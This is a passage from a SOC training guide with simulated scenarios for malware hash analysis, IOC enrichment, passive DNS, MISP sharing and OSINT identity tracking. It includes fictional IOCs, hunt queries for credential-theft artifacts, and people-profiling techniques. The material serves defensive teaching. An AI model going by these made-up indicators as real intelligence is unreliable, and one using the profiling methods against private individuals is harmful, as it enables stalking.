Objective: Analyse a suspicious PE file hash provided by a third party to determine its
behaviour, malware family and evasion techniques
Tool: Joe Sandbox
Environment:

• PE file hash received from partner organisation

• Hash submitted to Joe Sandbox for static, dynamic and hybrid analysis
• Analyst reviews API behaviour, evasion and malware family detection

Step 1: Suspicious File Hash Received

Trigger:
A partner organisation reports possible compromise via email attachment. They provide
the SHA256 hash of the suspicious .exe file:

Hash:
17e38b8f149a7cf248812ddfc3f3d3e1f04d0147120f41c66b85731f77f6a3d2

Initial Indicators:

• File identified as Windows PE (Portable Executable)

 • No signature or publisher data
• Hash not found in internal threat feed

Step 2: Hash Lookup on Joe Sandbox

Action:

1. Go to [Link]
2. Use the search bar to input the file hash
3. If analysis exists, view full report; otherwise, request new analysis using the hash
submission
4. Navigate to:
o Static analysis
o Hybrid code graph
o Behavioural analysis
o MITRE ATT&CK mapping

Results:

Section Details
Verdict Malicious (Highly Threatening)
Malware Family IcedID Trojan
MITRE ATT&CK T1055 (Process Injection), T1059 (Command Execution), T1027
(Obfuscation)
Key Behaviour C2 contact over HTTPS, Anti-VM, Injects into [Link]
Signature Matches API Hooking, Windows Defender Evasion, Macro Dropper
Network Behaviour POST to xmaildrop[.]me and beacon every 90s
File System Drops [Link], creates autorun entry
Changes
Evasion Sleep obfuscation, RDTSC timing, sandbox detection
Techniques
Screenshot Hidden PowerShell, modified registry settings
Evidence

Step 3: Threat Correlation and IOC Extraction

IOC Summary:

Type Indicator
IP [Link]
Domain xmaildrop[.]me
Dropped File [Link]
Registry Path HKCU\Software\Microsoft\Windows\Run\WinStartup
Mutex IcedID_Mutex_123
Splunk Query to Detect Presence:

index=edr_logs OR index=network
| search file_name="[Link]" OR domain="[Link]" OR
registry_path="*WinStartup*"

Findings:

• One machine reported outbound HTTPS to xmaildrop[.]me

• Another machine has file hash match in Sysmon logs

Step 4: Response Plan

Host Status Action Taken
WKS-DEV-2023 IOC match (domain) Isolated, memory forensics initiated
WKS-MGMT-002 Dropped file found Quarantine and threat eradication
All endpoints IOC sweep completed No further hits

EDR Actions:

• IOC blocklist pushed

• YARA rules created for [Link] and known IcedID artifacts
• Email threat shared with other SOCs via ISAC feed

Step 5: Documentation and SOC Enrichment

Wiki Entry:

Field Details
Tool Used Joe Sandbox
Verdict Malicious
Malware Family IcedID
IOC Summary Domain, hash, mutex, registry path
Behaviour Summary Process injection, C2 communication, stealth evasion
ATT&CK Techniques T1055, T1059, T1027

SOC Playbook Updated:

• Joe Sandbox added to hash triage workflow

• Include sandbox verdict in risk scoring algorithm
• Internal hunt queries prepared based on this analysis
INTEZER

Intezer focuses on code similarity and genetic malware analysis. It compares file hashes
against a large corpus of known malware code to detect code reuse and identify malware
families based on functional similarity.

Use Cases:

• Perform genetic code analysis of binaries using hash lookups.

• Detect whether a file shares code with known malware families, even if not
detected by AV.
• Identify reuse of code across malware variants, APT toolkits and commodity
malware.
• Support threat attribution by linking samples to previously analysed campaigns.

Practical Application: An EDR tool flags an unknown binary. The SOC analyst checks
its hash in Intezer and finds it shares 80% of its codebase with TrickBot. This code
similarity provides attribution confidence and allows the team to hunt for other
related indicators.

Scenario Simulation: Code Reuse Detection and Attribution Using Intezer

Context

Objective: Validate and attribute a suspicious binary flagged by an EDR agent using genetic
code analysis from Intezer
Tool: Intezer Analyze
Environment:

• Suspicious PE file detected by EDR

• Hash extracted and checked in Intezer
• Analysis used for malware family detection, code reuse and campaign correlation

Step 1: Suspicious Binary Detected

Trigger:
EDR flags unknown binary client_service.exe running from %AppData%\Roaming\svc\. No
signature, unknown hash in VT, not seen in enterprise before.

Hash:
1d6e3dcd16bde8b9fcf43d1932b68d2d7ccfa8975a5a4dfd2ff2c8b7a30cf377

Initial Observation:
 • Parent process: [Link]
• Network behaviour: HTTP POST to suspicious .ru domain
• Memory injection detected (target: [Link])

Step 2: Hash Lookup in Intezer

Action:

1. Navigate to [Link]
2. Input the SHA256 hash into the search field
3. Wait for scan result or initiate new analysis
4. Examine the returned genetic analysis and classification report

Results:

Section Output
Verdict Malicious
Malware Family TrickBot
Code Reuse Score 81% match to TrickBot (2022 variant)
Genome Mapping Shared components: loader, credential stealer, infostealer
MITRE Mapping T1055, T1082, T1003, T1566
Behavioural Traits Credential dumping, persistence, browser injection
Associated Campaign Tracked back to spam run seen in Eastern Europe

Step 3: Threat Attribution and IOC Pivoting

IOC Extraction from Intezer Report:

Type Indicator
Malware TrickBot
Family
Registry Key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ClientService
Dropped File [Link]
External URL hxxp://serv-cdn[.]ru/api
Parent Hashes Other variants seen in March-April 2025

Splunk Query for Threat Hunt:

index=edr_logs OR index=sysmon
| search file_name="client_service.exe" OR domain="[Link]" OR
registry_path="*ClientService*"

Outcome:
 • Two additional machines had matching mutex and outbound traffic
• All endpoints using this binary were isolated
• Detection rule created using Intezer IOC tags

Step 4: Response and SOC Actions

Immediate Response:

Host Status Action

FIN-APPS-001 Infected Quarantined, memory dump collected
HR-ADMIN-004 Beacon detected Disconnected, forensic imaging

SOC Improvements:

• Intezer integration proposed in triage pipeline

• Attribution added to weekly threat report
• IOC pushed to SIEM and EDR blocklists

Step 5: Documentation and Process Enhancement

Knowledgebase Entry:

Field Description
Tool Used Intezer
Binary Hash 1d6e3dcd16bde8b9fcf43d1932b68d2d...
Family Attributed TrickBot (2022 Variant)
MITRE ATT&CK Mappings T1055, T1082, T1003, T1566
IOC Summary URL, file path, registry entry, mutex
Detection Strategy Behavioural + genetic similarity

Playbook Update:

• Hash lookup via Intezer for all unknown binaries flagged by EDR
• Add playbook decision point: >70% code reuse → Treat as known malware family
• Genetic correlation scores added as part of risk scoring
REVERSINGLABS

ReversingLabs is a threat intelligence and file reputation platform offering in-depth file
hash lookups with rich metadata, classification and static analysis. It focuses on detecting
malware at scale and is used in enterprise and SOC environments.

Use Cases:

• Search for file reputation data using hash values.

• Access classification tags, threat scores and file provenance.
• Integrate with SOAR and sandbox platforms for real-time hash enrichment.
• Detect polymorphic or obfuscated variants of known malware.

Practical Application: A file flagged during vulnerability scanning is hashed and

checked on ReversingLabs. The result shows it is a variant of a known infostealer, with
polymorphic behaviour designed to evade signature detection. This leads to
immediate blocklisting and threat hunting.

Scenario Simulation: Polymorphic Malware Detection and Enrichment Using

ReversingLabs

Context

Objective: Validate file reputation and detect polymorphic malware variants during
vulnerability assessment using ReversingLabs
Tool: ReversingLabs TitaniumCloud
Environment:

• Endpoint vulnerability scan triggered file upload

• Hash enrichment via ReversingLabs
• SIEM: Splunk, with enrichment data injected via SOAR

Step 1: Suspicious File Flagged During Assessment

Trigger:
A routine Nessus vulnerability scan flags a suspicious .dll in the temp directory of a
development server (DEV-SERVER-001). The DLL is not signed and was recently dropped
by an installer package used by a third-party vendor.

File Path:
C:\Users\DevApp\AppData\Local\Temp\svc_host.dll
SHA256 Hash:
3a1cdd09b1e65b2d83e9e5a2c1150c1dbbe776cd9c145ea1642e17c158790af3
Initial triage indicates:

• Unknown hash (not in internal hash whitelist)

• No match in VirusTotal or Hybrid Analysis
• Suspicious strings include references to CredentialCache and Chrome\Login Data

Step 2: Hash Lookup in ReversingLabs

Action:

1. Navigate to ReversingLabs Lookup

2. Input the file's SHA256 hash
3. Review classification tags, threat score and static analysis
4. Cross-check family identification and indicators

Findings:

Field Value
Threat Classification Malicious (Threat Score: 94)
Malware Family Raccoon Stealer (polymorphic variant)
Tags Infostealer, Polymorphic, Credential Access
File Type PE32 DLL (DLL file)
Obfuscation Techniques Junk code, encrypted strings, anti-disassembly
Code Similarity 76% match with known 2023 Raccoon Stealer variant
MITRE Mappings T1003, T1056, T1059

Static Observables Extracted:

• Embedded string: Login [Link]

• Registry access to Software\Microsoft\Windows\CurrentVersion\Run
• API usage: CryptUnprotectData, GetUserNameA

Step 3: Integration into SOC Workflow

SOAR Enrichment Task:

ReversingLabs API used to enrich all hashes detected by vulnerability scans:

POST [Link]
{
"hash": "3a1cdd09b1e65b2d83e9e5a2c1150c1dbbe776cd9c145ea1642e17c158790af3"
}

Automated Output:
 Attribute Result
Risk Level High
Family Raccoon Stealer
IOC Tag Credential Theft
Suggested Action Quarantine + Hunt

Splunk Hunt Query Example:

index=edr_logs OR index=sysmon
| search
file_hash="3a1cdd09b1e65b2d83e9e5a2c1150c1dbbe776cd9c145ea1642e17c158790af3
"
OR file_name="svc_host.dll"
OR command_line="*Login Data*"

Step 4: Response and Containment

Host Status Action Taken
DEV-SERVER-001 Infected Process terminated, file quarantined, full scan initiated
DEV-SERVER-002 At Risk Registry key detected, further analysis
All Workstations Monitored IOC distributed for endpoint-wide detection

EDR Signatures Updated:

• Hash blocklisted
• Registry and file path detection rules added
• Raccoon Stealer family rule pushed via SOAR

Step 5: Documentation and Mapping

Knowledgebase Entry:

Field Description
Tool Used ReversingLabs
Hash Investigated 3a1cdd09b1e65b2d83e9e5a2c1150c1db...
Malware Family Raccoon Stealer (Polymorphic Variant)
Threat Classification Malicious (Score: 94)
IOC Summary Hash, file name, registry path, strings
MITRE Techniques T1003 (Credential Dumping), T1056, T1059
Detection Strategy Static + SOAR enrichment

Playbook Update:

• Added ReversingLabs lookup step to post-vulnerability triage

• Tagging of polymorphic detections with priority score
• Created detection logic for obfuscated DLLs with registry persistence
9. API AGGREGATORS AND OSINT AUTOMATION
PLATFORMS
INTELOWL

IntelOwl is an open-source threat intelligence orchestration platform designed to query

multiple OSINT services through a single API. It supports enrichment of observables such
as IPs, domains, hashes and URLs using both free and commercial sources.

Use Cases:

• Automatically enrich IOCs from incident alerts with contextual threat intelligence.
• Query multiple services (e.g., VirusTotal, AbuseIPDB, [Link], Shodan) from a
single interface.
• Integrate with SOAR or custom playbooks for threat triage automation.
• Aggregate passive DNS, malware relationships, reputation and threat scoring.

Practical Application: A SIEM alert produces multiple IOCs. Instead of manually

querying each source, the analyst uses IntelOwl to fetch all relevant data (AV
detections, passive DNS, URL behaviour, etc.) in one place. This saves time and
improves triage accuracy.

Scenario Simulation: IOC Triage Automation Using IntelOwl

Context

Objective: Automate enrichment of multiple IOCs generated from a suspicious outbound

traffic alert using IntelOwl to speed up triage and improve investigation depth.

Tool: IntelOwl
Environment:

• SIEM: Splunk and Suricata logs

• IOCs: 1 suspicious IP, 2 domains, 1 hash, 1 URL
• Integration: IntelOwl deployed locally and integrated via API with SOAR

Step 1: SIEM Alert Generates Multiple IOCs

Trigger:
An outbound connection alert is triggered from a workstation (FIN-USER-04) to an
unknown IP address over TCP port 443. The analyst extracts IOCs from Suricata alert logs:

IOC Type Value

 IP [Link]
Domain update-checker[.]cc
Domain hxxp://maliciousfiles[.]net
Hash a61e911ef2d96309709b72e09a2d4537f8370f6c530f5cc0f0b6c8cf38a0f678
URL [Link]

Step 2: IOC Submission to IntelOwl

Action:

1. Access local instance of IntelOwl

2. Create a new request group and submit all IOCs in one batch
3. Select relevant analyzers (VirusTotal, AbuseIPDB, [Link], Shodan,
ThreatCrowd, CIRCL, etc.)
4. Initiate enrichment

Configuration:

• sources: VirusTotal, URLScan, CIRCL, Shodan

• analysers_enabled: passive_dns, ip_reputation, url_behavior, malware_analysis,
hash_reputation

Command via API (example using cURL):

curl -X POST [Link] \

-H 'Authorization: Bearer <API_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{"type": "ip", "data": "[Link]", "analyzers": ["AbuseIPDB", "Shodan", "OTX"]}'

Step 3: IntelOwl Enrichment Results

Findings:

IOC Key Findings

[Link] Listed on AbuseIPDB for phishing, Shodan shows open HTTP server
update- Associated with RedLine Stealer C2, passive DNS reveals multiple
[Link] subdomains
[Link] Sandbox analysis flagged EXE downloads; domain registered 7 days
ago
hash (SHA256) Detected as RedLine variant by 56/70 AV engines, connects to
above IPs
URL URLScan shows file download, redirects to secondary loader URL

Mapped Techniques:
 • MITRE T1105 (Ingress Tool Transfer)
• MITRE T1071.001 (C2 over HTTP)

Step 4: Response and Playbook Automation

SOAR Automation Step:

• IntelOwl API integrated into SOAR playbook

• All IOCs passed for enrichment upon alert creation
• Enrichment results added to Splunk notable event timeline
• Triage analyst receives summarised report with reputation scores, AV hits and
behaviour patterns

Immediate Actions Taken:

IOC Action Taken

IP Blocked on perimeter firewall
Domain Sinkholed using DNS RPZ
Hash EDR rule created for detection
URL Proxy block enforced, logged in SIEM

Step 5: Documentation and Mapping

Wiki/Knowledgebase Entry Created:

Field Description
Tool Used IntelOwl
IOC Set 5 indicators (IP, domains, hash, URL)
Threat Family RedLine Stealer
Intel Sources Used VirusTotal, AbuseIPDB, URLScan, CIRCL, OTX
MITRE ATT&CK Mapping T1105, T1071.001
Result IOC triaged in <5 minutes, automated actions initiated

SOC Playbook Update:

• IntelOwl batch enrichment added to Phase 1 (IOC Triage)

• SOAR connector configured to trigger based on alert category (malware, beaconing)
• IOC scoring rules:
o High AV + Passive DNS = Critical
o Unknown hash = Flag for sandbox submission
SPIDERFOOT

SpiderFoot is an automation-focused reconnaissance and threat intelligence tool. It

collects data across hundreds of OSINT sources and correlates them to uncover
connections between IPs, domains, email addresses and infrastructure components.

Use Cases:

• Perform automated reconnaissance during threat investigations or red team

exercises.
• Discover relationships between threat actor infrastructure (shared IPs, domains,
WHOIS info).
• Use passive DNS, SSL cert analysis, reputation checks and breach data to expand
findings.
• Run scheduled scans for brand monitoring or threat surface discovery.

Practical Application: An analyst investigates a phishing campaign using a known

domain. SpiderFoot is used to identify connected infrastructure, shared hosting IPs,
similar WHOIS registrants and reused email addresses, exposing an entire phishing
kit network.

Scenario Simulation: Infrastructure Correlation Using SpiderFoot

Context

Objective: Investigate a phishing campaign domain to uncover related threat infrastructure

using SpiderFoot automation.

Tool: SpiderFoot
Environment:

• Target Domain: secure-login-mail[.]com (used in phishing email)

• SpiderFoot HX (local instance)
• SIEM: Suricata + Phishing Email Reporting Portal
• Analyst Workstation: Linux-based investigation VM

Step 1: Initial IOC Extraction

Trigger:
A user reports a suspicious email with a phishing link pointing to [Link]
mail[.]com/reset. The SOC team extracts the domain from the email header and body.

Pre-Check:
 • Confirm domain is not internal
• Validate as suspicious via VirusTotal and reputation feeds

Step 2: SpiderFoot Scan Setup

Action:

1. Launch SpiderFoot GUI or CLI

2. Create a new scan task for domain: [Link]
3. Enable modules:
o Passive DNS
o WHOIS
o SSL Certs
o IP Reputation
o Email Leaks
o Affiliations and Metadata

CLI Example:

python3 [Link] -s [Link] -m passive_dns,whois,sslcert,cohosts,emailrep -o

spiderfoot_report.html

Scan Duration: ~10–15 minutes depending on modules and API rate limits

Step 3: Intelligence Collection and Correlation

SpiderFoot Findings:

Type Data
IP Address [Link] (Shared with 22 other phishing domains)
WHOIS Email admin@[Link] (linked to 12 malicious domains)
SSL Certificate Self-signed, reused in 8 other C2 panels
Co-Hosted Sites [Link], [Link]
Breach Email info@[Link] seen in 2023 breach (combo list)
Netblock Hosted in ASN registered to shady VPS provider in Eastern Europe
Passive DNS Shows rotation among several subdomains

Step 4: Threat Attribution and Infrastructure Mapping

Correlated Infrastructure:

Observable Link Established

admin@[Link] Connected to 12 domains, reused in WHOIS records
[Link] Shared by 22 malicious domains
 SSL Hash (SHA1) Matches C2 certificate used in RedLine campaigns
Passive DNS Subdomains Match phishing kit patterns across multiple sites

Mapped Techniques:

• MITRE T1583.001 (Acquire Infrastructure: Domains)

• MITRE T1583.003 (Acquire Infrastructure: Virtual Private Server)
• MITRE T1585.001 (Establish Accounts: Social Media)

Step 5: Response Actions and Documentation

Action Taken:

Action Description
IOC Blocklist Updated Domains and IP added to DNS RPZ and perimeter firewall
Threat Intel Platform WHOIS email, SSL hash, netblock tagged as malicious
Updated
Investigation Report Filed Attached SpiderFoot output and IOC enrichment
Playbook Triggered Alert escalated in SOAR workflow for phishing
infrastructure
Step 6: Playbook and Intelligence Enrichment

Playbook Updates:

• SpiderFoot scanning added to phishing triage workflow

• Scheduled SpiderFoot scan added for critical brand assets (e.g., [Link])

SIEM Integration:

• Suricata configured to alert on co-hosted domain hits

• Phishing detection rules updated based on WHOIS + passive DNS relationships
CIRCL PASSIVE DNS

CIRCL Passive DNS is a service provided by the Computer Incident Response Center
Luxembourg that stores historical DNS resolutions. It allows analysts to view how domains
and IPs have changed over time.

Use Cases:

• Investigate the resolution history of malicious domains and discover past IP

associations.
• Identify other domains hosted on the same IP to detect malicious infrastructure
reuse.
• Correlate DNS changes with attack timelines.
• Understand domain lifecycle during incident response or forensic analysis.

Practical Application: A malicious domain resolves to a benign-looking IP. Using

CIRCL Passive DNS, the analyst sees the domain previously resolved to a C2 server
two weeks ago and was part of a known malware campaign. This context confirms it is
untrustworthy despite the recent change.

Scenario Simulation: Domain History Verification with CIRCL Passive DNS

Context

Objective: Verify whether a domain previously linked to malicious activity has changed its
IP address to evade detection and assess trustworthiness based on resolution history.

Tool: CIRCL Passive DNS

Environment:

• Alert Source: Email Gateway Alert

• IOC: accountupdate-mail[.]com
• Tool Access: Analyst uses CIRCL Passive DNS through API and web portal

Step 1: Alert and Domain Analysis

Trigger:
An internal user reports a phishing email disguised as a Microsoft account update. The link
in the email points to:

[Link]

Initial sandbox and URL scans show that the domain resolves to:
[Link]

No major AV detection or blocklist entry is found, making the domain appear clean.

Step 2: Passive DNS Lookup Using CIRCL

Action:

1. Analyst opens CIRCL Passive DNS platform.

2. Queries for historical resolution of the domain:

[Link]

Alternate API Call:

curl -H "Accept: application/json" [Link]

[Link]

Output Example:

[
{
"rrname": "[Link]",
"rrtype": "A",
"rdata": "[Link]",
"time_first": "2024-06-15",
"time_last": "2024-06-21"
},
{
"rrname": "[Link]",
"rrtype": "A",
"rdata": "[Link]",
"time_first": "2024-07-03",
"time_last": "present"
}
]
Step 3: Historical IP Attribution

Findings:

Historical IP Date Range Notes

[Link] 15–21 June Previously reported in C2 communication logs from a
2024 RedLine Stealer campaign
 [Link] From 3 July No detection yet, hosted on shared VPS
2024

Correlated Threat Intel:

• IP [Link] tagged in past MISP feeds with malware campaign indicators

• Domain moved IPs post-campaign (classic evasion technique)

Step 4: Analyst Decision and Remediation

Although the current IP appears benign, CIRCL Passive DNS reveals malicious history
linked to the domain.

Action Taken:

Step Description
Domain Blocked Added to email and firewall blocklists
Historical C2 IP Investigated Other domains found linked to same old IP
IOC Escalated Domain submitted to MISP with tag: “TTP: Fast-Flux”
Timeline Updated Attack timeline adjusted based on DNS resolution shifts

Step 5: Documentation and Threat Mapping

MITRE ATT&CK Mapping:

Technique Technique Name Reason

ID
T1583.001 Acquire Infrastructure: Malicious domain was registered and used
Domains in campaign
T1071.001 Application Layer Protocol: HTTP/S phishing link distribution
Web
T1568.002 Dynamic Resolution IP shifting used to evade detection (DNS
fast-flux)

Threat Wiki Update:

• CIRCL Passive DNS entry added

• API usage documented for automation
• Playbook updated to always include passive DNS history lookup in phishing triage
MISP (MALWARE INFORMATION SHARING PLATFORM & THREAT SHARING)

MISP is an open-source threat intelligence platform that enables sharing of threat

indicators, malware data, TTPs and threat actor profiles between trusted organisations. It
also supports automation, correlation and contextual tagging of threat events.

Use Cases:

• Collect and correlate IOCs from internal incidents, external reports and peer
organisations.
• Share threat intelligence feeds with other SOCs, ISACs or CERTs.
• Enrich alerts with contextual data including MITRE ATT&CK mappings and threat
actor profiles.
• Automate ingestion of threat intel into detection systems like SIEM or EDR.

Practical Application: During a targeted phishing campaign, the SOC ingests shared
indicators from a trusted partner’s MISP instance. The data includes sender domains,
hashes of attachments and URLs used. These indicators are pushed to the mail
gateway and SIEM for proactive blocking and alerting.

Scenario Simulation: Collaborative Threat Intelligence and IOC Distribution Using

MISP

Context

Objective: Detect and respond to a targeted phishing campaign by ingesting threat data
from a trusted partner’s MISP instance and automatically integrating indicators into
internal security tools.

Tool: MISP Threat Intelligence Platform

Environment:

• SOC Platform: MISP v2.4 instance deployed internally

• Integration: Connected to SIEM (Splunk) and Mail Gateway (Proofpoint)
• Trust Community: Member of local ISAC and one private CERT

Step 1: Threat Detection and Sharing from Partner MISP Instance

Trigger:
An oil and gas company, part of the same ISAC, shares a MISP event tagged as TLP:AMBER
related to a targeted phishing campaign using fake job offer lures.

Shared Indicators:
 • Sender Domain: recruitment-global[.]org
• Attachment Hash: d1f4c89c0c1f23f23841cbfc81f63ae2 (Excel dropper)
• Malicious URL: [Link]
• Observed Threat Actor: APT-C-99
• MITRE Tags: T1566.001 (Phishing via Email), T1204.002 (Malicious File)

Step 2: Ingestion and Correlation in Local MISP

Action:

• Open internal MISP instance

• Go to Sync Actions > Pull Events
• Sync event using organisation UUID of the trusted partner
• Review pulled event details

Result:

• Event successfully ingested

• All attributes (domain, hash, URL, actor, tags) preserved
• Automatically correlated with internal events based on matching URL seen in proxy
logs

Step 3: IOC Distribution and Automated Response

Automation Workflow:

1. Export Feed: MISP → SIEM (Splunk) → via REST API

2. Email Gateway: MISP → Proofpoint → Block sender domain + hash match on
attachment
3. EDR: Hash indicator ingested into Cortex XDR IOC list

Splunk Correlation Rule:

index=email_logs sender_domain="[Link]"

Action Taken:

System IOC Ingested Response Triggered

Splunk SIEM Domain + URL Alert on matching internal emails
Email Gateway Domain + Hash Block + Quarantine new emails
EDR/XDR Hash Block execution + alert endpoint

Step 4: Contextual Threat Intelligence and Analyst Review

MISP Tag Enrichment:

• MITRE ATT&CK: T1566.001 (Phishing), T1204.002 (User Execution)

• Threat Actor: APT-C-99 (suspected spear phishing group)
• Malware: [Link]

Analyst Notes:

• Domain [Link] had previously been observed in Q1 campaigns

• Dropper file connects to C2 via HTTPS and performs initial reconnaissance

Step 5: Reporting, Documentation and Feedback Sharing

SOC Wiki Entry:

• Full breakdown of the phishing campaign added to internal wiki

• Included all IOCs, screenshots from phishing emails, behaviour of the dropper and
links to MISP event

Feedback to Partner:

• Used MISP Proposal function to suggest additional tagging: T1059 (Command &
Scripting Interpreter)

Dashboard Update:

• Monthly intel ingestion count increased by 15%

• Playbook updated to reflect auto-blocking policy for MISP-verified TLP:AMBER
events
10. SOCIAL MEDIA AND IDENTITY TRACKING
SOCIAL SEARCHER

Social Searcher is a real-time search engine for public social media content. It allows
users to search for keywords, usernames, hashtags and mentions across platforms like
Facebook, Twitter, Instagram, TikTok, LinkedIn and more.

Use Cases:

• Monitor for mentions of brand names, executives or confidential keywords across

social media.
• Detect impersonation attempts of corporate profiles or VIPs.
• Investigate leaked data, attack coordination or early indicators of planned
campaigns.
• Conduct reputation monitoring or digital risk protection (DRP).

Practical Application: A threat actor impersonates a company executive on Twitter.

Using Social Searcher, the SOC analyst identifies the fake account, collects
screenshots of messages targeting employees and reports the impersonation to the
platform for takedown.

Scenario Simulation: Executive Impersonation via Twitter

Objective: Detect and respond to impersonation of a corporate executive using Social

Searcher by monitoring social media mentions and fake accounts.

Tool: Social Searcher ([Link]

Context

• Company: Nexaware Cybersecurity Ltd

• Executive: Maria Lee, CISO
• Incident Trigger: A junior employee receives a suspicious DM from someone
claiming to be Maria Lee, asking for sensitive financial files

Step 1: Initial Analyst Response

Trigger:
Employee flags a message on Twitter from account: @Maria_NexawareCEO

Suspicious Message Screenshot:

"Hi, I need a copy of the latest Q3 budget file for an urgent board review. Please email it to
my personal address, [Link]@nexawareconsultant[.]pro"

Step 2: Search on Social Searcher

Action:
SOC Analyst logs into Social Searcher
Inputs keyword: Maria Nexaware
Filters by:

• Platform: Twitter
• Timeframe: Past 7 Days
• Result Type: All (posts, profiles, mentions)

Search Output

Top 3 Results:

Profile Handle Name Type Notes

@Maria_NexawareCEO Maria Lee – Nexaware Profile
Low follower count, joined
2 days ago
@MariaLee_Real Maria Lee Verified Official CISO account
Tweet by “Scammers pretending Post Links to
@sec_insider24 to be execs again. @Maria_NexawareCEO
Watch out.”

Additional Indicators:

• The fake account only posts messages asking for “urgent access”
• DMs multiple employees (pattern found by keyword budget file + Maria)
• Profile picture copied from LinkedIn
• Bio includes “CISO | Nexaware Ltd – Vision First”

Step 3: Confirm and Investigate Impersonation

Indicators of Impersonation:

• Recent account creation

• Copy-pasted corporate role
• No engagement history
• Pattern of phishing messages targeting internal staff

Triage Actions:
 • Screenshots saved as evidence
• Compared account metadata with LinkedIn profile
• Analyst checks mentions via Social Searcher to confirm it's spreading

Step 4: Response Actions

Step Action Description
1 Analyst escalates to Security Awareness team
2 Security team alerts all employees via email and internal comms
3 SOC reports fake Twitter profile via Twitter impersonation form
4 Domain nexawareconsultant[.]pro submitted to blocklist
5 WHOIS lookup confirms domain registered 3 days ago via Namecheap
6 Analyst adds indicators (fake account handle, domain) to internal threat intel feed
7 A detection rule is created to monitor similar social media patterns in Social
Searcher

Step 5: Documentation and Threat Mapping

MITRE ATT&CK Mapping:

Technique Name Reason

ID
T1585.001 Establish Accounts: Social Media Fake Twitter profile
Accounts
T1566.002 Phishing: Spearphishing via Service Direct messages to
employees
T1589.003 Gather Victim Identity Information Profile and email spoofing

IOC Summary:

Type Indicator Description

Twitter @Maria_NexawareCEO Impersonation account
Email [Link]@nexawareconsultant[.]pro Suspicious email address
Domain nexawareconsultant[.]pro Spoofed domain
Phrase “Q3 budget file” Phishing lure

Step 6: Update Playbook and Automate Monitoring

Playbook Update:

• All VIP impersonation alerts must be run through Social Searcher

• SOC team will run keyword-based scheduled scans daily for:
o Executive names
o Company name + roles
o Domain spoof patterns
 o Common phishing themes (e.g., "urgent", "wire transfer", "budget")

Example Automation:
Set up Social Searcher alerts for:

Query: ("Maria Lee" OR "Nexaware CISO") AND ("budget file" OR "urgent")

Frequency: Hourly
Platform: Twitter + LinkedIn
MALTEGO

Maltego is a powerful link analysis and data correlation tool used for mapping relationships
between people, domains, IPs, email addresses, phone numbers and social media
profiles. It integrates with OSINT databases and APIs to visualise connections across the
internet.

Use Cases:

• Investigate online identities and link them to social accounts, domains or

infrastructure.
• Map threat actor personas and digital footprints.
• Perform people-centric threat hunting, social engineering analysis or insider threat
investigations.
• Correlate email addresses and usernames to breached data and social profiles.

Practical Application: An attacker is using a Gmail address to target the company’s

support inbox. Maltego is used to identify other usernames and social profiles linked
to the same email, which reveals the attacker’s presence on multiple forums and their
connected infrastructure.

Scenario Simulation: Threat Actor Infrastructure Mapping Using Maltego

Objective: Trace a threat actor’s Gmail address used in targeted phishing emails and
uncover linked domains, usernames and social profiles.

Tool: Maltego (Community or Pro edition with standard OSINT transforms)

Context

• Trigger:
Security team receives multiple phishing emails from:
[Link]@[Link]
• Phishing Content:
Claims to be from the IT team asking users to reset passwords via a fake portal.
• Initial IOC:
Sender email: [Link]@[Link]

Step 1: Set Up Maltego Canvas

Action:

1. Launch Maltego
2. Create a new graph
 3. Add a Person entity with alias: [Link]@[Link]

Step 2: Run Transforms

Transform Run 1: Email Address → Associated Usernames and Domains

• Transforms:
o To Domains using this Email
o To Social Profiles using this Email
o To Breached Credentials

Output:

Entity Type Entity Details

Domain updates-pw-reset[.]com Registered using this email
Username cyberdog187 Found on data leak from
RaidForums
Social Twitter: @cyberdog_187 Profile mentions “infosec fan”
Profile
Breach Data Password reuse found: P@ss1234 on 3
breaches

Step 3: Expand Graph for Infrastructure Links

Transform Run 2: Domain → Infrastructure Analysis

1. Select updates-pw-reset[.]com
2. Run transforms:
o To WHOIS Info
o To Hosting IP
o To MX Records
o To DNS Records
o To SSL Certificates

Output:

Entity Type Value Notes

IP Address [Link] Hosted on VPS provider in Ukraine
WHOIS Name Hidden via Privacy Protect Common tactic by threat actors
SSL Cert CN *.reset-login[.]online Another domain variant linked
Subdomain [Link] Control panel access

Step 4: Identity Correlation

Transform Run 3: Username → Online Persona Discovery

• Selected username: cyberdog187

• Transforms:
o To Social Networks
o To Email Addresses
o To Domain Ownership

Findings:

Entity Type Detail

Telegram @cyberdog187_sec – active in hacktivist forums
GitHub Account linked, contains phishing templates
Pastebin Multiple pastes with mass email scripts and harvested credentials
Breached Email cyberdog187@[Link]
Step 5: Threat Attribution & Summary

Findings Summary:

IOC Category Notes

[Link]@[Link] Initial Email IOC Used in phishing attacks
cyberdog187 Threat Actor Alias Found on dark web & social
updates-pw-reset[.]com Phishing Domain Linked via WHOIS and SSL
@cyberdog_187 (Twitter) Impersonation Profile aligns with actor
[Link] Hosting IP Shared across campaigns
*.reset-login[.]online Alternate Domain Common certificate linkage

MITRE ATT&CK Mapping:

Technique Technique Name Justification

ID
T1585.001 Establish Accounts: Email Gmail used for phishing
T1583.006 Acquire Infrastructure: Web Domains Domains registered for
phishing
T1566.002 Phishing: Spearphishing via Service Email campaign targeting staff
T1589.002 Gather Victim Identity: Email Email harvesting observed
Addresses
Step 6: Remediation Actions
Action Step Description
IOC Blocklisting All domains, email and IPs added to blocklists
Twitter Reporting Report @cyberdog_187 for impersonation
DNS Sinkhole Setup Sinkhole for updates-pw-reset[.]com
 Threat Intel Data pushed to internal MISP instance
Enrichment
Detection Rule Update Regex patterns for pw-reset, login, [Link] in email
filters
Team Briefing Incident summary shared for user awareness and response
drills
Automation Potential

• API-based transform scheduling using Maltego Machines

• Export graph data into SOAR platform for response action
• Use Auto-Expand to explore new entities as they are detected over time
SHERLOCK

Sherlock is an open-source Python tool that checks for the availability of a given username
across hundreds of social media platforms and websites. It is commonly used to identify
user aliases and online identities.

Use Cases:

• Find all public profiles associated with a threat actor’s handle or alias.
• Trace cybercriminal activity across underground forums, chat platforms and public
services.
• Build a user profile during phishing, scam or harassment investigations.
• Link usernames to known leaks or persona infrastructure.

Practical Application: A scammer is using the alias “h4ck3r_malaysia” in phishing

campaigns. Using Sherlock, the SOC identifies the same username on GitHub,
Telegram, Reddit and Pastebin, some of which contain code samples and links to C2
infrastructure.

Scenario Simulation: User Alias Profiling with Sherlock

Objective: Identify a threat actor’s online presence using a known alias and correlate it
with malicious campaigns and infrastructure.

Tool: Sherlock (GitHub: [Link]

Context

• Trigger:
An internal phishing incident report includes a signature at the bottom of the
phishing email:
~ h4ck3r_malaysia
• Initial IOC:
